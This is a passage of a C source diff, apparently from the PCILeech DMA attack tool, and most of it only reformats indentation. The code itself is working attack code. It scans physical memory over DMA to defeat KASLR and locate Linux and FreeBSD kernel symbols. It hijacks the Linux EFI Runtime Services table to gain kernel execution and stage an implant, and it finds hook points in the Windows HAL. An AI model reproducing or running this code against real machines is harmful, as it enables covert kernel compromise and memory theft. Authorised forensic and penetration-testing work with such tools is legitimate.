+        if(0 == *(PDWORD)(pb64M + i - 4)) {
+            break;
+        }
+    }
+    dwo_strtab = i;
+    i = i - 8; // skip necessary
+    // 3: scan backwards for 'vn_open' function address
+    while(TRUE) {
+        i -= 0x18;
+        if(i < 0x1000) { goto error; }
+        if(0 == *(PQWORD)(pb64M + i)) { goto error; }
+        if(dwo_memcpy_str - dwo_strtab == *(PDWORD)(pb64M + i)) { break; }
+    }
+    dwa_memcpy = *(PDWORD)(pb64M + i + 8) & 0x7fffffff;
+    // 4: create signature
+    LocalFree(pb64M);
+    Util_CreateSignatureFreeBSDGeneric(dwo_strtab, dwa_memcpy, pSignature);
+    return TRUE;
 error:
-	LocalFree(pb64M);
-	return FALSE;
+    LocalFree(pb64M);
+    return FALSE;
 }
 
 //-------------------------------------------------------------------------------
@@ -278,176 +278,180 @@ BOOL KMD_FreeBSDKernelSeekSignature(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PSIGNAT
 
 BOOL KMD_LinuxIsAllAddrFoundSeek(_In_ PKERNELSEEKER pS, _In_ DWORD cS)
 {
-	DWORD j;
-	for(j = 0; j < cS; j++) {
-		if(!pS[j].aSeek) {
-			return FALSE;
-		}
-	}
-	return TRUE;
+    DWORD j;
+    for(j = 0; j < cS; j++) {
+        if(!pS[j].aSeek) {
+            return FALSE;
+        }
+    }
+    return TRUE;
 }
 
 BOOL KMD_LinuxIsAllAddrFoundTableEntry(_In_ PKERNELSEEKER pS, _In_ DWORD cS)
 {
-	DWORD j;
-	for(j = 0; j < cS; j++) {
-		if(!pS[j].aTableEntry) {
-			return FALSE;
-		}
-	}
-	return TRUE;
+    DWORD j;
+    for(j = 0; j < cS; j++) {
+        if(!pS[j].aTableEntry) {
+            return FALSE;
+        }
+    }
+    return TRUE;
 }
 
 BOOL KMD_LinuxFindFunctionAddr(_In_ PBYTE pb, _In_ DWORD cb, _In_ PKERNELSEEKER pS, _In_ DWORD cS)
 {
-	DWORD o, i;
-	for(o = 0; o < cb - 0x1000; o++) {
-		for(i = 0; i < cS; i++) {
-			if(!pS[i].aSeek && !memcmp(pb + o, pS[i].pbSeek, pS[i].cbSeek)) {
-				pS[i].aSeek = o + 1;
-				if(KMD_LinuxIsAllAddrFoundSeek(pS, cS)) {
-					return TRUE;
-				}
-			}
-		}
-	}
-	return FALSE;
+    DWORD o, i;
+    for(o = 0; o < cb - 0x1000; o++) {
+        for(i = 0; i < cS; i++) {
+            if(!pS[i].aSeek && !memcmp(pb + o, pS[i].pbSeek, pS[i].cbSeek)) {
+                pS[i].aSeek = o + 1;
+                if(KMD_LinuxIsAllAddrFoundSeek(pS, cS)) {
+                    return TRUE;
+                }
+            }
+        }
+    }
+    return FALSE;
 }
 
 BOOL KMD_LinuxFindFunctionAddrTBL(_In_ PBYTE pb, _In_ DWORD cb, _In_ PKERNELSEEKER pS, _In_ DWORD cS)
 {
-	DWORD o, i;
-	for(o = 0x1000; o < cb - 0x1000; o = o + 8) {
-		if(((*(PQWORD)(pb + o) & 0xffffffff00000000) == 0xffffffff00000000) && ((*(PQWORD)(pb + o - 8) & 0xffffffff00000000) == 0xffffffff00000000)) { // kernel addr ptr
-			for(i = 0; i < cS; i++) {
-				if(!pS[i].aTableEntry &&
-					((*(PQWORD)(pb + o) & 0x1fffff) == (0x1fffff & pS[i].aSeek)) && // KASLR align on 2MB boundries (0x1fffff)
-					((*(PQWORD)(pb + o) & ~0x1fffff) != (*(PQWORD)(pb + o - 8)  & ~0x1fffff))) // several tables may exists - skip symbol name table
-				{
-					pS[i].aTableEntry = o;
-					pS[i].vaSeek = *(PQWORD)(pb + o);
-					pS[i].vaFn = *(PQWORD)(pb + o - 8);
-					if(KMD_LinuxIsAllAddrFoundTableEntry(pS, cS)) {
-						return TRUE;
-					}
-				}
-			}
-		}
-	}
-	return FALSE;
+    DWORD o, i;
+    for(o = 0x1000; o < cb - 0x1000; o = o + 8) {
+        if(((*(PQWORD)(pb + o) & 0xffffffff00000000) == 0xffffffff00000000) && ((*(PQWORD)(pb + o - 8) & 0xffffffff00000000) == 0xffffffff00000000)) { // kernel addr ptr
+            for(i = 0; i < cS; i++) {
+                if(!pS[i].aTableEntry &&
+                    ((*(PQWORD)(pb + o) & 0x1fffff) == (0x1fffff & pS[i].aSeek)) && // KASLR align on 2MB boundries (0x1fffff)
+                    ((*(PQWORD)(pb + o) & ~0x1fffff) != (*(PQWORD)(pb + o - 8)  & ~0x1fffff))) // several tables may exists - skip symbol name table
+                {
+                    pS[i].aTableEntry = o;
+                    pS[i].vaSeek = *(PQWORD)(pb + o);
+                    pS[i].vaFn = *(PQWORD)(pb + o - 8);
+                    if(KMD_LinuxIsAllAddrFoundTableEntry(pS, cS)) {
+                        return TRUE;
+                    }
+                }
+            }
+        }
+    }
+    return FALSE;
 }
 
-#define CONFIG_LINUX_SEEK_BUFFER_SIZE	0x01000000
-#define CONFIG_LINUX_SEEK_CKSLIDES		512
+#define CONFIG_LINUX_SEEK_BUFFER_SIZE       0x01000000
+#define CONFIG_LINUX_SEEK_CKSLIDES          512
 BOOL KMD_Linux46KernelSeekSignature(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PSIGNATURE pSignature)
 {
-	BOOL result;
-	KERNELSEEKER ks[2] = {
-		{ .pbSeek = (PBYTE)"\0kallsyms_lookup_name",.cbSeek = 22 },
-		{ .pbSeek = (PBYTE)"\0vfs_read",.cbSeek = 10 }
-	};
-	DWORD cKSlide, dwKernelBase;
-	PBYTE pb = LocalAlloc(0, CONFIG_LINUX_SEEK_BUFFER_SIZE);
-	if(!pb) { return FALSE; }
-	for(cKSlide = 0; cKSlide < CONFIG_LINUX_SEEK_CKSLIDES; cKSlide++) {
-		// calculate the kernel base (@16M if no KASLR, @2M offsets if KASLR).
-		// read 16M of memory first, if KASLR read 2M chunks at top of analysis buffer (performance reasons).
-		dwKernelBase = 0x01000000 + cKSlide * 0x00200000; // KASLR = 16M + ([RND:0..511] * 2M) ???
-		if(cKSlide == 0) {
-			DeviceReadDMAEx(ctx, dwKernelBase, pb, 0x01000000, NULL, 0);
-		} else {
-			memmove(pb, pb + 0x00200000, CONFIG_LINUX_SEEK_BUFFER_SIZE - 0x00200000);
-			result = DeviceReadDMA(
-				ctx,
-				dwKernelBase + CONFIG_LINUX_SEEK_BUFFER_SIZE - 0x00200000,
-				pb + CONFIG_LINUX_SEEK_BUFFER_SIZE - 0x00200000,
-				0x00200000,
-				PCILEECH_MEM_FLAG_RETRYONFAIL);
-		}
-		result = 
-			KMD_LinuxFindFunctionAddr(pb, CONFIG_LINUX_SEEK_BUFFER_SIZE, ks, 2) &&
-			KMD_LinuxFindFunctionAddrTBL(pb, CONFIG_LINUX_SEEK_BUFFER_SIZE, ks, 2);
-		if(result) {
-			Util_CreateSignatureLinuxGeneric(dwKernelBase, ks[0].aSeek, ks[0].vaSeek, ks[0].vaFn, ks[1].aSeek, ks[1].vaSeek, ks[1].vaFn, pSignature);
-			break;
-		}
-	}
-	LocalFree(pb);
-	return result;
+    BOOL result;
+    KERNELSEEKER ks[2] = {
+        { .pbSeek = (PBYTE)"\0kallsyms_lookup_name",.cbSeek = 22 },
+        { .pbSeek = (PBYTE)"\0vfs_read",.cbSeek = 10 }
+    };
+    DWORD cKSlide, dwKernelBase;
+    PBYTE pb = LocalAlloc(0, CONFIG_LINUX_SEEK_BUFFER_SIZE);
+    if(!pb) { return FALSE; }
+    for(cKSlide = 0; cKSlide < CONFIG_LINUX_SEEK_CKSLIDES; cKSlide++) {
+        // calculate the kernel base (@16M if no KASLR, @2M offsets if KASLR).
+        // read 16M of memory first, if KASLR read 2M chunks at top of analysis buffer (performance reasons).
+        dwKernelBase = 0x01000000 + cKSlide * 0x00200000; // KASLR = 16M + ([RND:0..511] * 2M) ???
+        if(cKSlide == 0) {
+            DeviceReadDMAEx(ctx, dwKernelBase, pb, 0x01000000, NULL, 0);
+        } else {
+            memmove(pb, pb + 0x00200000, CONFIG_LINUX_SEEK_BUFFER_SIZE - 0x00200000);
+            result = DeviceReadDMA(
+                ctx,
+                dwKernelBase + CONFIG_LINUX_SEEK_BUFFER_SIZE - 0x00200000,
+                pb + CONFIG_LINUX_SEEK_BUFFER_SIZE - 0x00200000,
+                0x00200000,
+                PCILEECH_MEM_FLAG_RETRYONFAIL);
+        }
+        result =
+            KMD_LinuxFindFunctionAddr(pb, CONFIG_LINUX_SEEK_BUFFER_SIZE, ks, 2) &&
+            KMD_LinuxFindFunctionAddrTBL(pb, CONFIG_LINUX_SEEK_BUFFER_SIZE, ks, 2);
+        if(result) {
+            Util_CreateSignatureLinuxGeneric(dwKernelBase, ks[0].aSeek, ks[0].vaSeek, ks[0].vaFn, ks[1].aSeek, ks[1].vaSeek, ks[1].vaFn, pSignature);
+            break;
+        }
+    }
+    LocalFree(pb);
+    return result;
 }
 
 QWORD KMD_Linux48KernelBaseSeek(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	PAGE_STATISTICS ps;
-	BYTE pb[0x1000], pbCMP90[0x400], pbCMP00[0x100];
-	QWORD qwA, qwAddrMax, i;
-	BOOL isAuthenticAMD, isGenuineIntel;
-	memset(pbCMP90, 0x90, 0x400);
-	memset(pbCMP00, 0x00, 0x100);
-	qwA = max(0x01000000, ctx->cfg->qwAddrMin) & 0xffffffffffe00000;
-	qwAddrMax = max(0x01000000, (ctx->cfg->dev.qwAddrMaxNative - 0x01000000) & 0xffffffffffe00000);
-	PageStatInitialize(&ps, qwA, qwAddrMax, "Scanning for Linux kernel base", FALSE, FALSE);
-	// Linux kernel uses 2MB pages. Base of kernel is assumed to have AuthenticAMD and GenuineIntel strings
-	// in first page. First page should also end with at least 0x400 0x90's. 2nd page (hypercall page?) is
-	// assumed to end with 0x100 0x00's.
-	for(; qwA <= qwAddrMax; qwA += 0x00200000) {
-		ps.qwAddr = qwA;
-		if(!DeviceReadDMA(ctx, qwA, pb, ctx->cfg->fPartialPageReadSupported ? 0x400 : 0x1000, 0)) {
-			PageStatUpdate(&ps, qwA, 0, 512);
-			continue;
-		}
-		PageStatUpdate(&ps, qwA, 512, 0);
-		// Search for GenuineIntel and AuthenticAMD strings.
-		isGenuineIntel = isAuthenticAMD = FALSE;
-		for(i = 0; i < 0x400; i++) {
-			isAuthenticAMD |= ((0x68747541 == *(PDWORD)(pb + i)) && (0x69746e65 == *(PDWORD)(pb + i + 8)) && (0x444d4163 == *(PDWORD)(pb + i + 16)));
-			isGenuineIntel |= ((0x756e6547 == *(PDWORD)(pb + i)) && (0x49656e69 == *(PDWORD)(pb + i + 8)) && (0x6c65746e == *(PDWORD)(pb + i + 16)));
-		}
-		if(!isGenuineIntel || !isAuthenticAMD) {
-			continue;
-		}
-		// Verify that page ends with 0x400 NOPs (0x90).
-		if(!DeviceReadDMA(ctx, qwA, pb, 0x1000, 0) || memcmp(pb + 0xc00, pbCMP90, 0x400)) {
-			continue;
-		}
-		// read kernel base + 0x1000 (hypercall page?) and check that it ends with at least 0x100 0x00.
-		if(!DeviceReadMEM(ctx, qwA + 0x1000, pb, 0x1000, 0) || memcmp(pb + 0xf00, pbCMP00, 0x100)) {
-			continue;
-		}
-		PageStatClose(&ps);
-		return qwA;
-	}
-	PageStatClose(&ps);
-	return 0;
+    PAGE_STATISTICS ps;
+    BYTE pb[0x1000], pbCMP90[0x400], pbCMP00[0x100];
+    QWORD qwA, qwAddrMax, i;
+    BOOL isAuthenticAMD, isGenuineIntel;
+    memset(pbCMP90, 0x90, 0x400);
+    memset(pbCMP00, 0x00, 0x100);
+    qwA = max(0x01000000, ctx->cfg->qwAddrMin) & 0xffffffffffe00000;
+    qwAddrMax = max(0x01000000, (ctx->cfg->dev.qwAddrMaxNative - 0x01000000) & 0xffffffffffe00000);
+    PageStatInitialize(&ps, qwA, qwAddrMax, "Scanning for Linux kernel base", FALSE, FALSE);
+    // Linux kernel uses 2MB pages. Base of kernel is assumed to have AuthenticAMD and GenuineIntel strings
+    // in first page. First page should also end with at least 0x400 0x90's. 2nd page (hypercall page?) is
+    // assumed to end with 0x100 0x00's.
+    for(; qwA <= qwAddrMax; qwA += 0x00200000) {
+        ps.qwAddr = qwA;
+        if(!DeviceReadDMA(ctx, qwA, pb, 0x400, 0)) {
+            PageStatUpdate(&ps, qwA, 0, 512);
+            continue;
+        }
+        PageStatUpdate(&ps, qwA, 512, 0);
+        // Search for GenuineIntel and AuthenticAMD strings.
+        isGenuineIntel = isAuthenticAMD = FALSE;
+        for(i = 0; i < 0x400; i++) {
+            isAuthenticAMD |= ((0x68747541 == *(PDWORD)(pb + i)) && (0x69746e65 == *(PDWORD)(pb + i + 8)) && (0x444d4163 == *(PDWORD)(pb + i + 16)));
+            isGenuineIntel |= ((0x756e6547 == *(PDWORD)(pb + i)) && (0x49656e69 == *(PDWORD)(pb + i + 8)) && (0x6c65746e == *(PDWORD)(pb + i + 16)));
+        }
+        if(!isGenuineIntel || !isAuthenticAMD) {
+            continue;
+        }
+        // Verify that page ends with 0x400 NOPs (0x90).
+        if(!DeviceReadDMA(ctx, qwA, pb, 0x1000, 0) || memcmp(pb + 0xc00, pbCMP90, 0x400)) {
+            continue;
+        }
+        // read kernel base + 0x1000 (hypercall page?) and check that it ends with at least 0x100 0x00.
+        if(!DeviceReadMEM(ctx, qwA + 0x1000, pb, 0x1000, 0) || memcmp(pb + 0xf00, pbCMP00, 0x100)) {
+            continue;
+        }
+        PageStatClose(&ps);
+        return qwA;
+    }
+    PageStatClose(&ps);
+    return 0;
 }
 
+#define KMD_LINUX48SEEK_MAX_NUM_16MB_CHUNKS     2
 BOOL KMD_Linux48KernelSeekSignature(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PSIGNATURE pSignature)
 {
-	BOOL result;
-	QWORD qwKernelBase;
-	PAGE_STATISTICS ps;
-	KERNELSEEKER ks[2] = {
-		{ .pbSeek = (PBYTE)"\0kallsyms_lookup_name",.cbSeek = 22 },
-		{ .pbSeek = (PBYTE)"\0vfs_read",.cbSeek = 10 }
-	};
-	PBYTE pb = LocalAlloc(0, 0x01000000);
-	if(!pb) { return FALSE; }
-	qwKernelBase = KMD_Linux48KernelBaseSeek(ctx);
-	if(!qwKernelBase) { 
-		return FALSE; 
-	}
-	printf("\n");
-	PageStatInitialize(&ps, qwKernelBase, qwKernelBase + 0x01000000, "Verifying Linux kernel base", FALSE, FALSE);
-	result =
-		Util_Read16M(ctx, pb, qwKernelBase, &ps) &&
-		KMD_LinuxFindFunctionAddr(pb, 0x01000000, ks, 2) &&
-		KMD_LinuxFindFunctionAddrTBL(pb, 0x01000000, ks, 2);
-	if(result) {
-		Util_CreateSignatureLinuxGeneric(qwKernelBase, ks[0].aSeek, ks[0].vaSeek, ks[0].vaFn, ks[1].aSeek, ks[1].vaSeek, ks[1].vaFn, pSignature);
-	}
-	PageStatClose(&ps);
-	LocalFree(pb);
-	return result;
+    BOOL result;
+    DWORD o;
+    QWORD qwKernelBase;
+    PAGE_STATISTICS ps;
+    KERNELSEEKER ks[2] = {
+        { .pbSeek = (PBYTE)"\0kallsyms_lookup_name",.cbSeek = 22 },
+        { .pbSeek = (PBYTE)"\0vfs_read",.cbSeek = 10 }
+    };
+    PBYTE pb = LocalAlloc(0, 0x01000000 * KMD_LINUX48SEEK_MAX_NUM_16MB_CHUNKS);
+    if(!pb) { return FALSE; }
+    qwKernelBase = KMD_Linux48KernelBaseSeek(ctx);
+    if(!qwKernelBase) {
+        return FALSE;
+    }
+    printf("\n");
+    PageStatInitialize(&ps, qwKernelBase, qwKernelBase + 0x01000000 * KMD_LINUX48SEEK_MAX_NUM_16MB_CHUNKS, "Verifying Linux kernel base", FALSE, FALSE);
+    for(o = 0; o < 0x01000000 * KMD_LINUX48SEEK_MAX_NUM_16MB_CHUNKS; o += 0x01000000) {
+        result = Util_Read16M(ctx, pb + o, qwKernelBase + o, &ps);
+        if(!result) { break; }
+        result = KMD_LinuxFindFunctionAddr(pb, o + 0x01000000, ks, 2) && KMD_LinuxFindFunctionAddrTBL(pb, o + 0x01000000, ks, 2);
+        if(result) { break; }
+    }
+    if(result) {
+        Util_CreateSignatureLinuxGeneric(qwKernelBase, ks[0].aSeek, ks[0].vaSeek, ks[0].vaFn, ks[1].aSeek, ks[1].vaSeek, ks[1].vaFn, pSignature);
+    }
+    PageStatClose(&ps);
+    LocalFree(pb);
+    return result;
 }
 
 //-------------------------------------------------------------------------------
@@ -456,82 +460,82 @@ BOOL KMD_Linux48KernelSeekSignature(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PSIGNAT
 
 BOOL KMDOpen_LinuxEfiRuntimeServicesHijack(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	BOOL result;
-	QWORD i, o, qwAddrEfiRt;
-	DWORD dwPhysAddrS2, dwPhysAddrS3, *pdwPhysicalAddress;
-	BYTE pb[0x1000], pbOrig[0x1000], pbEfiRt[0x1000];
-	SIGNATURE oSignature;
-	//------------------------------------------------
-	// 1: Locate and fetch EFI Runtime Services table.
-	//------------------------------------------------
-	result = KMD_FindSignature_EfiRuntimeServices(ctx, &qwAddrEfiRt);
-	if(!result) {
-		printf("KMD: Failed. EFI Runtime Services not found.\n");
-	}
-	if((qwAddrEfiRt & 0xfff) + 0x88 > 0x1000) {
-		printf("KMD: Failed. EFI Runtime Services table located on page boundary.\n");
-		return FALSE;
-	}
-	result = DeviceReadDMA(ctx, qwAddrEfiRt & ~0xfff, pbEfiRt, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	if(!result || !IS_SIGNATURE_EFI_RUNTIME_SERVICES(pbEfiRt + (qwAddrEfiRt & 0xfff))) {
-		printf("KMD: Failed. Error reading EFI Runtime Services table.\n");
-		return FALSE;
-	}
-	//------------------------------------------------
-	// 2: Fetch signature and original data.
-	//------------------------------------------------
-	Util_CreateSignatureLinuxEfiRuntimeServices(&oSignature);
-	*(PQWORD)(oSignature.chunk[3].pb + 0x28) = qwAddrEfiRt; // 0x28 == offset data_addr_runtserv.
-	memcpy(oSignature.chunk[3].pb + 0x30, pbEfiRt + (qwAddrEfiRt & 0xfff) + 0x18, 0x70);	// 0x30 == offset data_runtserv_table_fn.
-	result = DeviceReadDMA(ctx, 0, pbOrig, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	if(!result) {
-		printf("KMD: Failed. Error reading at address 0x0.\n");
-		return FALSE;
-	}
-	//------------------------------------------------
-	// 3: Patch wait to reveive execution of EFI code.
-	//------------------------------------------------
-	DeviceWriteDMA(ctx, 0, oSignature.chunk[3].pb, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	for(i = 0; i < 14; i++) {
-		o = (qwAddrEfiRt & 0xfff) + 0x18 + 8 * i;	// 14 tbl entries of 64-bit/8-byte size.
-		*(PQWORD)(pbEfiRt + o) = 0x100 + 2 * i;	// each PUSH in receiving slide is 2 bytes, offset to code = 0x100.
-	}
-	DeviceWriteDMA(ctx, qwAddrEfiRt, pbEfiRt + (qwAddrEfiRt & 0xfff), 0x88 /* 0x18 hdr, 0x70 fntbl */, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	memset(pb, 0, 0x1000);
-	pdwPhysicalAddress = (PDWORD)(pb + 0x20);	// 0x20 == offset data_phys_addr_alloc.
-	printf(
-		"KMD: EFI Runtime Services table hijacked - Waiting to receive execution.\n"
-		"     To trigger EFI execution take action. Example: 'switch user' in the\n"
-		"     Ubuntu graphical lock screen may trigger EFI Runtime Services call.\n");
-	do {
-		Sleep(100);
-		if(!DeviceReadDMA(ctx, 0, pb, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-			Util_WaitForPowerCycle(ctx);
-			printf("KMD: Resume waiting to receive execution.\n");
-		}
-	} while(!*pdwPhysicalAddress);
-	dwPhysAddrS2 = *pdwPhysicalAddress;
-	printf("KMD: Execution received - waiting for kernel hook to activate ...\n");
-	//------------------------------------------------
-	// 4: Restore EFI Runtime Services shellcode and move on to 2nd buffer.
-	//------------------------------------------------
-	DeviceWriteDMA(ctx, 0, pbOrig, 0x1000, 0);
-	memset(pb, 0, 0x1000);
-	printf("KMD: Waiting to receive execution.\n");
-	do {
-		Sleep(100);
-		if(!DeviceReadDMA(ctx, dwPhysAddrS2, pb, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-			printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
-			return FALSE;
-		}
-	} while(!*pdwPhysicalAddress);
-	dwPhysAddrS3 = *pdwPhysicalAddress;
-	//------------------------------------------------
-	// 5: Clear 2nd buffer and set up stage #3.
-	//------------------------------------------------
-	memset(pb, 0, 0x1000);
-	DeviceWriteDMA(ctx, dwPhysAddrS2, pb, 0x1000, 0);
-	return KMD_SetupStage3(ctx, dwPhysAddrS3, oSignature.chunk[4].pb, 4096);
+    BOOL result;
+    QWORD i, o, qwAddrEfiRt;
+    DWORD dwPhysAddrS2, dwPhysAddrS3, *pdwPhysicalAddress;
+    BYTE pb[0x1000], pbOrig[0x1000], pbEfiRt[0x1000];
+    SIGNATURE oSignature;
+    //------------------------------------------------
+    // 1: Locate and fetch EFI Runtime Services table.
+    //------------------------------------------------
+    result = KMD_FindSignature_EfiRuntimeServices(ctx, &qwAddrEfiRt);
+    if(!result) {
+        printf("KMD: Failed. EFI Runtime Services not found.\n");
+    }
+    if((qwAddrEfiRt & 0xfff) + 0x88 > 0x1000) {
+        printf("KMD: Failed. EFI Runtime Services table located on page boundary.\n");
+        return FALSE;
+    }
+    result = DeviceReadDMA(ctx, qwAddrEfiRt & ~0xfff, pbEfiRt, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    if(!result || !IS_SIGNATURE_EFI_RUNTIME_SERVICES(pbEfiRt + (qwAddrEfiRt & 0xfff))) {
+        printf("KMD: Failed. Error reading EFI Runtime Services table.\n");
+        return FALSE;
+    }
+    //------------------------------------------------
+    // 2: Fetch signature and original data.
+    //------------------------------------------------
+    Util_CreateSignatureLinuxEfiRuntimeServices(&oSignature);
+    *(PQWORD)(oSignature.chunk[3].pb + 0x28) = qwAddrEfiRt; // 0x28 == offset data_addr_runtserv.
+    memcpy(oSignature.chunk[3].pb + 0x30, pbEfiRt + (qwAddrEfiRt & 0xfff) + 0x18, 0x70); // 0x30 == offset data_runtserv_table_fn.
+    result = DeviceReadDMA(ctx, 0, pbOrig, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    if(!result) {
+        printf("KMD: Failed. Error reading at address 0x0.\n");
+        return FALSE;
+    }
+    //------------------------------------------------
+    // 3: Patch wait to reveive execution of EFI code.
+    //------------------------------------------------
+    DeviceWriteDMA(ctx, 0, oSignature.chunk[3].pb, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    for(i = 0; i < 14; i++) {
+        o = (qwAddrEfiRt & 0xfff) + 0x18 + 8 * i; // 14 tbl entries of 64-bit/8-byte size.
+        *(PQWORD)(pbEfiRt + o) = 0x100 + 2 * i; // each PUSH in receiving slide is 2 bytes, offset to code = 0x100.
+    }
+    DeviceWriteDMA(ctx, qwAddrEfiRt, pbEfiRt + (qwAddrEfiRt & 0xfff), 0x88 /* 0x18 hdr, 0x70 fntbl */, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    memset(pb, 0, 0x1000);
+    pdwPhysicalAddress = (PDWORD)(pb + 0x20); // 0x20 == offset data_phys_addr_alloc.
+    printf(
+        "KMD: EFI Runtime Services table hijacked - Waiting to receive execution.\n"
+        "     To trigger EFI execution take action. Example: 'switch user' in the\n"
+        "     Ubuntu graphical lock screen may trigger EFI Runtime Services call.\n");
+    do {
+        Sleep(100);
+        if(!DeviceReadDMA(ctx, 0, pb, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+            Util_WaitForPowerCycle(ctx);
+            printf("KMD: Resume waiting to receive execution.\n");
+        }
+    } while(!*pdwPhysicalAddress);
+    dwPhysAddrS2 = *pdwPhysicalAddress;
+    printf("KMD: Execution received - waiting for kernel hook to activate ...\n");
+    //------------------------------------------------
+    // 4: Restore EFI Runtime Services shellcode and move on to 2nd buffer.
+    //------------------------------------------------
+    DeviceWriteDMA(ctx, 0, pbOrig, 0x1000, 0);
+    memset(pb, 0, 0x1000);
+    printf("KMD: Waiting to receive execution.\n");
+    do {
+        Sleep(100);
+        if(!DeviceReadDMA(ctx, dwPhysAddrS2, pb, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+            printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
+            return FALSE;
+        }
+    } while(!*pdwPhysicalAddress);
+    dwPhysAddrS3 = *pdwPhysicalAddress;
+    //------------------------------------------------
+    // 5: Clear 2nd buffer and set up stage #3.
+    //------------------------------------------------
+    memset(pb, 0, 0x1000);
+    DeviceWriteDMA(ctx, dwPhysAddrS2, pb, 0x1000, 0);
+    return KMD_SetupStage3(ctx, dwPhysAddrS3, oSignature.chunk[4].pb, 4096);
 }
 
 //-------------------------------------------------------------------------------
@@ -540,138 +544,138 @@ BOOL KMDOpen_LinuxEfiRuntimeServicesHijack(_Inout_ PPCILEECH_CONTEXT ctx)
 
 BOOL KMD_Win_SearchTableHalpInterruptController(_In_ PBYTE pbPage, _In_ QWORD qwPageVA, _Out_ PDWORD dwHookFnPgOffset)
 {
-	DWORD i;
-	BOOL result;
-	for(i = 0; i < (0x1000 - 0x78); i += 8) {
-		result =
-			(*(PQWORD)(pbPage + i + 0x18) == 0x28) &&
-			((*(PQWORD)(pbPage + i + 0x00) & ~0xfff) == qwPageVA) &&
-			((*(PQWORD)(pbPage + i + 0x10) & ~0xfff) == qwPageVA) &&
-			((*(PQWORD)(pbPage + i + 0x78) & 0xffffff0000000000) == 0xfffff80000000000);
-		if(result) {
-			*dwHookFnPgOffset = i + 0x78;
-			return TRUE;
-		}
-	}
-	return FALSE;
+    DWORD i;
+    BOOL result;
+    for(i = 0; i < (0x1000 - 0x78); i += 8) {
+        result =
+            (*(PQWORD)(pbPage + i + 0x18) == 0x28) &&
+            ((*(PQWORD)(pbPage + i + 0x00) & ~0xfff) == qwPageVA) &&
+            ((*(PQWORD)(pbPage + i + 0x10) & ~0xfff) == qwPageVA) &&
+            ((*(PQWORD)(pbPage + i + 0x78) & 0xffffff0000000000) == 0xfffff80000000000);
+        if(result) {
+            *dwHookFnPgOffset = i + 0x78;
+            return TRUE;
+        }
+    }
+    return FALSE;
 }
 
 BOOL KMDOpen_UEFI_FindEfiBase(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	PBYTE pb;
-	PAGE_STATISTICS ps;
-	DWORD dwAddrCurrent, dwAddrMax, o;
-	QWORD qwAddr_BOOTSERV, qwAddr_RUNTSERV;
-	printf("KMD: Searching for EFI BASE (no -efibase parameter supplied).\n");
-	// initialize & allocate memory
-	pb = LocalAlloc(0, 0x100000);
-	if(!pb) { return FALSE;  }
-	dwAddrCurrent = SIZE_PAGE_ALIGN_4K(ctx->cfg->qwAddrMin);
-	dwAddrMax = max(0xffffffff, SIZE_PAGE_ALIGN_4K(ctx->cfg->qwAddrMax) - 1);
-	PageStatInitialize(&ps, dwAddrCurrent, dwAddrMax, "Searching for EFI BASE", FALSE, FALSE);
-	// loop EFI BASE (IBI SYST) find
-	while(dwAddrCurrent <= dwAddrMax - 0x100000) {
-		if(DeviceReadDMAEx(ctx, dwAddrCurrent, pb, 0x100000, &ps, 0)) {
-			for(o = 0; o < 0x100000 - 0x100; o += 8) {
-				if(0x5453595320494249 != *(PQWORD)(pb + o)) { continue; } // IBI SYST
-				qwAddr_BOOTSERV = *(PQWORD)(pb + o + 0x60);
-				qwAddr_RUNTSERV = *(PQWORD)(pb + o + 0x58);
-				if((qwAddr_BOOTSERV & 0xffffffff00000007) || (qwAddr_RUNTSERV & 0xffffffff00000007)) { continue; }
-				if(!(qwAddr_BOOTSERV & 0xfffffff8) || !(qwAddr_RUNTSERV & 0xfffffff8)) { continue; }
-				ctx->cfg->qwEFI_IBI_SYST = dwAddrCurrent + o;
-				ps.szAction = "Waiting for KMD to activate";
-				PageStatClose(&ps);
-				LocalFree(pb);
-				return TRUE;
-			}
-		} else {
-			PageStatUpdate(&ps, dwAddrCurrent + 0x100000, 0, 0x100);
-		}
-		dwAddrCurrent += 0x100000;
-	}
-	LocalFree(pb);
-	PageStatClose(&ps);
-	return FALSE;
+    PBYTE pb;
+    PAGE_STATISTICS ps;
+    DWORD dwAddrCurrent, dwAddrMax, o;
+    QWORD qwAddr_BOOTSERV, qwAddr_RUNTSERV;
+    printf("KMD: Searching for EFI BASE (no -efibase parameter supplied).\n");
+    // initialize & allocate memory
+    pb = LocalAlloc(0, 0x100000);
+    if(!pb) { return FALSE;  }
+    dwAddrCurrent = SIZE_PAGE_ALIGN_4K(ctx->cfg->qwAddrMin);
+    dwAddrMax = max(0xffffffff, SIZE_PAGE_ALIGN_4K(ctx->cfg->qwAddrMax) - 1);
+    PageStatInitialize(&ps, dwAddrCurrent, dwAddrMax, "Searching for EFI BASE", FALSE, FALSE);
+    // loop EFI BASE (IBI SYST) find
+    while(dwAddrCurrent <= dwAddrMax - 0x100000) {
+        if(DeviceReadDMAEx(ctx, dwAddrCurrent, pb, 0x100000, &ps, 0)) {
+            for(o = 0; o < 0x100000 - 0x100; o += 8) {
+                if(0x5453595320494249 != *(PQWORD)(pb + o)) { continue; } // IBI SYST
+                qwAddr_BOOTSERV = *(PQWORD)(pb + o + 0x60);
+                qwAddr_RUNTSERV = *(PQWORD)(pb + o + 0x58);
+                if((qwAddr_BOOTSERV & 0xffffffff00000007) || (qwAddr_RUNTSERV & 0xffffffff00000007)) { continue; }
